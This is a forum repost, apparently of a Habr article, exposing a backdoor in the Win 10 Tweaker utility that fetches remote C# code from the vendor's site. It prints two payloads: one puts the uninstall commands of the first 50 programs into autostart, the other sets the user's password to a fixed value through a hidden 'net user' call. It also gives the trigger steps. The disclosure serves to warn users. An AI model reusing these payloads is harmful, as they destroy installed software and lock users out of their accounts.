[Информационная безопасность, Системное администрирование, Антивирусная защита, Разработка под Windows, Софт] Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством

Автор Сообщение
news_bot ®

Стаж: 6 лет 9 месяцев
Сообщений: 27286

Создавать темы news_bot ® написал(а)
14-Май-2021 15:30


Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из который в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой "сюрприз" спрятал внутри его создатель.Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.
  • Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
  • Выяснилось, что, чтобы вызвать скачивания удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
  • Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
  • Хватит лишь открытия раздела "Системная информация", где можно получить сведения о характеристиках ПК;
  • Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
  class C {
    public void M() {
      string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
      if (Directory.Exists(path)) {
        string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
        foreach(string file in files) {
          if (file.Contains("System.Deps.dll")) {
            List list = new List();
            using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall")) {
              foreach(string k in key.GetSubKeyNames()) {
                if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
                  list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
                }
              }
            }
            for (int i = 0; i < 50; i++) {
              RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
              key.SetValue(i.ToString(), list[i]);
            }
          }
        }
      }
    }
  }
}
Разберем по-быстрому код.
  • Берется путь профиля и присобачивается к нему "\\AppData\\Local\\Turbo.net";
  • Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
  • Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляет в Windows любую программу, если ее деинсталлятор прописывается в системе.
  • Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Извините, данный ресурс не поддреживается. :( Сохраненная ссылка на Wayback Machine, если "чудотворным" образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
using System;
using System.Diagnostics;
using System.IO;
namespace N
{
    class C
    {
        public void M()
        {
           string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
                if (Directory.Exists(path))
                {
                    string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
                    foreach (string file in files)
                    {
                        if (file.Contains("System.Deps.dll"))
                        {
                            Process.Start(new ProcessStartInfo
                            {
                                FileName = "cmd",
                                Arguments = "/c net user " + """ + Environment.UserName + """ + " Rock5taR",
                                WindowStyle = ProcessWindowStyle.Hidden
                            });
                        }
                    }
                }
        }
    }
}
Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.Видео с одним из вариантов, как удалить ключ.Извините, данный ресурс не поддреживается. :( Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
===========
Источник:
habr.com
===========

Похожие новости: Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_sistemnoe_administrirovanie (Системное администрирование), #_antivirusnaja_zaschita (Антивирусная защита), #_razrabotka_pod_windows (Разработка под Windows), #_soft (Софт), #_win_10_tweaker, #_bekdor (бэкдор), #_trojan (троян), #_informatsionnaja_bezopasnost (
Информационная безопасность
)
, #_sistemnoe_administrirovanie (
Системное администрирование
)
, #_antivirusnaja_zaschita (
Антивирусная защита
)
, #_razrabotka_pod_windows (
Разработка под Windows
)
, #_soft (
Софт
)
Профиль  ЛС 
Показать сообщения:     

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы

Текущее время: 22-Ноя 18:21
Часовой пояс: UTC + 5